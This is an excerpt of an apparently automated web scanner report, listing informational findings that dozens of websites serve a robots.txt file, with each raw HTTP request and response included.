Vary: Accept-Encoding
Content-Length: 91
Connection: close
Content-Type: text/html

# /robots.txt file for http://www.onedollaremailoffer.com/

User-agent: *
Disallow: /

26.767. http://www.onlineradiostations.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.onlineradiostations.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlineradiostations.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Last-Modified: Fri, 14 Dec 2007 02:27:28 GMT
ETag: "2eb028c-154-44135cdc2a400"
Accept-Ranges: bytes
Content-Length: 340
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

26.768. http://www.opensubtitles.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensubtitles.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opensubtitles.org

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "4196570913"
Last-Modified: Sun, 12 Jul 2009 15:10:47 GMT
Content-Length: 206
Date: Tue, 03 May 2011 10:23:20 GMT
Age: 0
Connection: close
X-Cache: MISS
X-Cache-Backend: all

User-agent: *
Disallow: /libs/
Disallow: /*/download/
Disallow: /*/xml
Disallow: /*/simplexml
User-agent: Baiduspider
Disallow: /
Sitemap: http://www.opensubtitles.org/sitem
...[SNIP]...

26.769. http://www.orlandoairports.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orlandoairports.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orlandoairports.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a DAV/2 Phusion_Passenger/3.0.0 PHP/5.3.3
Last-Modified: Fri, 11 Dec 2009 20:24:01 GMT
ETag: "1a86ce-c4-47a79b449283e"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /reports/
Disallow: /arrive/arrive.htm
Disallow: /ops/bus_taxi.htm
Disallow: /ops/rac.htm
Disallow: /depart/depart.htm
Disallow: /schedule/
Disallow: /ops/term.htm
Allow: /

26.770. http://www.osbornewood.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.osbornewood.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.osbornewood.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:48 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Thu, 27 May 2010 20:36:21 GMT
ETag: "23c0019-62-4879957e1bb40"
Accept-Ranges: bytes
Content-Length: 98
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /misc/Osborne%20Wood%20Products,%20Inc.%20-%20%20Employee%20Handbook.pdf

26.771. http://www.osobnosti.cz/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.osobnosti.cz
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.osobnosti.cz

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 11:32:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Fri, 29 Apr 2011 08:10:18 GMT
ETag: "13a943-f1-4a20a3451ee80"
Cache-Control: max-age=0, must-revalidate
Expires: Mon, 02 May 2011 15:08:34 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 241

user-agent: *
disallow: /_vti_bin/shtml.exe/
disallow: MSOfficecltreq.asp

#User-agent: SeznamBot
#Request-rate: 30/1m 0300-1259 # 05:00-14:59
#Request-rate: 10/1m 1300-1559 # 15:00-17:59
#Requ
...[SNIP]...

26.772. http://www.our-hometown.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.our-hometown.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.our-hometown.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:23 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 15:28:11 GMT
ETag: "f00000017dd5b-9e2-48d65aa12bbc7"
Accept-Ranges: bytes
Content-Length: 2530
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.773. http://www.outdoorsdirectory.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outdoorsdirectory.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoorsdirectory.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:50 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.8 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.8.9
Last-Modified: Sat, 02 Jan 2010 01:56:38 GMT
ETag: "281d350-dd-47c24cc792180"
Accept-Ranges: bytes
Content-Length: 221
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /specials/
Disallow: /akpages/classic/
Disallow: /outdo3/
Disallow: /cgi-local/
Disallow: /cgi-bin/
Disallow: /demo/
Disallow: /od_cms/

User-agent:InfoSeek Sidewinder
Disallo
...[SNIP]...

26.774. http://www.outsidethebeltway.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outsidethebeltway.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outsidethebeltway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 11:07:05 GMT
Content-Type: text/plain
Content-Length: 187
Last-Modified: Thu, 18 Oct 2007 01:59:49 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /styles/
Disallow: /fotos/
Disallow: /mt/
Disallow: /cgi-bin/
Disallow: /scgi-bin/
Disallow: /wordpress/wp-content/themes/

User-agent: ConveraCrawler
Disallow: /

26.775. http://www.ozgrid.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ozgrid.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ozgrid.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:16 GMT
Server: Apache
Last-Modified: Mon, 03 Nov 2008 02:14:55 GMT
Accept-Ranges: bytes
Content-Length: 1622
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/archive/
Disallow: /forum//archive/
Disallow: /cgi-bin/
Disallow: /download/
Disallow: /forumstop/
Disallow: /images/
Disallow: /inc/
Disallow: /FreeDownloads/
Disallow:
...[SNIP]...

26.776. http://www.paintballforum.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paintballforum.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paintballforum.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:57 GMT
Server: Apache
Last-Modified: Wed, 29 Nov 2006 03:00:00 GMT
Accept-Ranges: bytes
Content-Length: 1063
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admincp/
Disallow: /cgi-bin/
Disallow: /clientscript/
Disallow: /includes/
Disallow: /install/
Disallow: /gallery/showmembers.php
Disallow: /gallery/misc.php
Disallow: /galler
...[SNIP]...

26.777. http://www.pakalertpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pakalertpress.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pakalertpress.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:40:20 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.pakalertpress.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 78

User-agent: *
Disallow:

Sitemap: http://www.pakalertpress.com/sitemap.xml.gz

26.778. http://www.palmbeachschools.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.palmbeachschools.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.palmbeachschools.org

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Last-Modified: Tue, 30 Jun 2009 14:28:50 GMT
Accept-Ranges: bytes
ETag: "4cd54b168ff9c91:2d3a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:30:52 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.779. http://www.paradisefibers.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paradisefibers.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paradisefibers.net

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 21:02:35 GMT
Accept-Ranges: bytes
ETag: "5e21fd9a301cc1:20e0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:13:41 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

26.780. http://www.pasadena.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pasadena.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pasadena.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:27 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g JRun/4.0
Last-Modified: Mon, 28 Feb 2011 19:37:49 GMT
ETag: "500000003e8a8-7c-49d5cd09ca20b"
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gateway/
Disallow: /includes/
Disallow: /portal/
Disallow: /shatford/
Disallow: /wp-support/

26.781. http://www.patioshoppers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.patioshoppers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.patioshoppers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:36 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 01:48:31 GMT
Accept-Ranges: bytes
Content-Length: 453
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /shoppingcart/

Disallow: /shop/

Disallow: /of/

Disallow: /of/4/Codeine-pills.html

Disallow: /of/4/Codeine-without-prescription.html

Disallow: /1/

Disallow:
...[SNIP]...

26.782. http://www.pay-dayin60seconds.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pay-dayin60seconds.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pay-dayin60seconds.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:53 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:11:47 GMT
ETag: "87360f-e7-4d30ae03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

26.783. http://www.paydayin-60seconds.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paydayin-60seconds.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paydayin-60seconds.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:32 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.3 mod_ssl/2.8.31 OpenSSL/0.9.8o
Last-Modified: Tue, 11 Jan 2011 15:25:38 GMT
ETag: "36b1192-e7-4d2c7672"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

26.784. http://www.paytel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paytel.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paytel.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:24 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 01:11:24 GMT
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.785. http://www.pcusa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcusa.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcusa.org

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 03 May 2011 10:35:39 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Content-Length: 313

User-agent: *
Disallow: /get/

Disallow: /search/

Disallow: /browse/

Disallow: /accounts/

Disallow: /comments/

Disallow: /news/feeds/
Disallow: /resource/feeds/

Disallow: /snippet/

Disallow: /mi
...[SNIP]...

26.786. http://www.pdfonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pdfonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pdfonline.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/plain
Last-Modified: Thu, 21 Apr 2011 20:31:19 GMT
Accept-Ranges: bytes
ETag: "7c3c6312630cc1:1b50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:36:47 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

Disallow: /easypdf/sdk5/
Disallow: /easypdf/sdk60/

User-agent: googlebot
Disallow: *.csi

Sitemap: ht
...[SNIP]...

26.787. http://www.pearsonassessments.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pearsonassessments.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pearsonassessments.com

Response

HTTP/1.1 200 OK
Content-Length: 181
Content-Type: text/plain
Last-Modified: Mon, 20 Sep 2010 17:43:15 GMT
Accept-Ranges: bytes
ETag: "ebe3d84deb58cb1:adf"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:31:55 GMT
Connection: close

User-agent: *
Disallow: /*.asp$
Disallow: /assessments/
Disallow: /reports/
Disallow: /pa-legal/
Disallow: /pai/ea/eahome.htm
Disallow: /hai/ProductLongDesc.aspx
Allow: /

26.788. http://www.pecentral.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pecentral.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pecentral.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:33:00 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 29 Oct 2001 19:02:16 GMT
ETag: "02c9839ac60c11:b20"
Content-Length: 237

User-agent: *
Disallow: /admin
Disallow: /stats
Disallow: /lessonideas/EmailLesson.asp
Disallow: /lessonideas/PrintLesson.asp
Disallow: /bp/bpEmailLesson.asp
Disallow: /bp/bpVote.asp
Disallow:
...[SNIP]...

26.789. http://www.pentaximaging.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pentaximaging.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pentaximaging.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:28 GMT
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3600
Content-Length: 736
Content-Type: text/plain
Last-Modified: Mon, 10 Nov 2008 06:51:43 GMT
Accept-Ranges: none
ETag: "cb6084ca043c91:2dc"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Connection: close

# This file is read and obeyed by polite search engines
# Please refer to the W3C notes:
# http://www.w3.org/TR/html4/appendix/notes.html#h-B.4.1.1
# or http://info.webcrawler.com/mak/projects/robots/
...[SNIP]...

26.790. http://www.peoples-law.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peoples-law.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peoples-law.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 May 2010 01:53:13 GMT
ETag: "1fa87a6-636-485e334939440"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:35:03 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.791. http://www.pfiwestern.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pfiwestern.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pfiwestern.com

Response

HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/plain
Last-Modified: Fri, 03 Dec 2010 18:12:19 GMT
Accept-Ranges: bytes
ETag: "743ded9f1593cb1:40c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:35:48 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.pfiwestern.com/sitemap.xml

26.792. http://www.pgcc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pgcc.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pgcc.edu

Response

HTTP/1.1 200 OK
Content-Length: 143
Content-Type: text/plain
Content-Location: http://www.pgcc.edu/robots.txt
Last-Modified: Fri, 13 Jun 2008 17:46:32 GMT
Accept-Ranges: bytes
ETag: "d5ffa6a7dcdc81:1f62"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:58:14 GMT
Connection: close

User-agent: *
Disallow: /Bin/
Disallow: /Cache/
Disallow: /WebServices
Disallow: /Media
Request-rate: 1/30
Visit-time: 0300-0700

26.793. http://www.philstart.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.philstart.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.philstart.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Sat, 20 Nov 2010 09:26:14 GMT
ETag: "8527f1-284-495789d44f980"
Accept-Ranges: bytes
Content-Length: 644
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_private/
Disallow: /go.php
Disallow: /ok.php
Disallow: /linkpages/go.php
Disallow: /linkpages/ok.php
Disallow: /linkpages/fl.php
Disallow: /linkpages/fo.php
Disallow:
...[SNIP]...

26.794. http://www.photostockplus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.photostockplus.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.photostockplus.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Apr 2011 22:03:51 GMT
ETag: "ac21fd-31-4a0330d22bfc0"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Crawl-delay: 5.0

26.795. http://www.pianostreet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pianostreet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pianostreet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:38 GMT
Server: Apache/1.3.37 (Unix) PHP/5.1.6 mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Last-Modified: Thu, 30 Dec 2010 23:13:13 GMT
ETag: "ac1715-44e-4d1d1209"
Accept-Ranges: bytes
Content-Length: 1102
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /search/searchsingle_v2.php*
Disallow: /piano_music/download_11/
Disallow: /piano_music/download_2/
Disallow: /piano_music/download_21/
Disallow: /piano_music/download_3/
Disal
...[SNIP]...

26.796. http://www.picnet.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.picnet.com.au
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picnet.com.au

Response

HTTP/1.1 200 OK
Content-Length: 473
Content-Type: text/plain
Last-Modified: Thu, 14 Oct 2010 00:50:10 GMT
Accept-Ranges: bytes
ETag: "ae59d9c0396bcb1:398f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:18:11 GMT
Connection: close

User-agent: *
Disallow: /marco/
Disallow: /met/bin/
Disallow: /met/log/
Disallow: /met/Properties/
Disallow: /met/resources/
Disallow: /met/tmp/
Disallow: /met/Default.aspx
Disallow: /met/METE
...[SNIP]...

26.797. http://www.picturesofengland.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.picturesofengland.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picturesofengland.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:55 GMT
Server: Apache
Last-Modified: Tue, 12 Feb 2008 16:11:43 GMT
ETag: "70323-17-4ffc8dc0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.798. http://www.pittsburghmagazine.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pittsburghmagazine.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pittsburghmagazine.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:52 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 01:33:39 GMT
ETag: "5e378ce-1a-b5f602c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.799. http://www.piworld.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.piworld.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.piworld.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Jun 2010 16:36:57 GMT
ETag: "204-baa47c40"
Accept-Ranges: bytes
Content-Length: 516
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *Disallow: /adv_images/Disallow: /includes/Disallow: /r/Disallow: /resources/Disallow: /comments/Disallow: /links/Disallow: /pdfs/Disallow: /promo/Disallow: /cinfo/Disallow: /ima
...[SNIP]...

26.800. http://www.planet49.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.planet49.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.planet49.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain;charset=iso-8859-1
Accept-Ranges: bytes
ETag: "285070989"
Last-Modified: Mon, 23 Aug 2010 12:13:04 GMT
Content-Length: 36
Date: Tue, 03 May 2011 10:27:36 GMT
Server: be p49com-atlas

User-agent: ia_archiver
Disallow: /

26.801. http://www.planetadeletras.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.planetadeletras.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.planetadeletras.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 07:02:22 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 19 May 2010 19:28:10 GMT
ETag: "114017c-44-486f7754f0680"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:
User-agent: *
Allow: /

26.802. http://www.playbillstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playbillstore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playbillstore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:25 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:27:25 GMT
Last-Modified: Tue, 19 Apr 2011 05:05:22 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.803. http://www.playmymovs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playmymovs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playmymovs.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:24:49 GMT
Content-Type: text/plain
Content-Length: 36
Last-Modified: Tue, 11 Jan 2011 08:50:55 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Baiduspider
Disallow: /

26.804. http://www.playpacman.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playpacman.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playpacman.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:17 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 27 Mar 2009 23:14:55 GMT
ETag: "117280f8-162-46621e69019c0"
Accept-Ranges: bytes
Content-Length: 354
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /_inline
Disallow: /_tla
Disallow: /_js
Allow: /asteroids/
Allow: /frogger/
Allow: /hexxagon/
Allow: /simon/
Allow: /snake/
Allow: /sonic/
Allow: /space_inv
...[SNIP]...

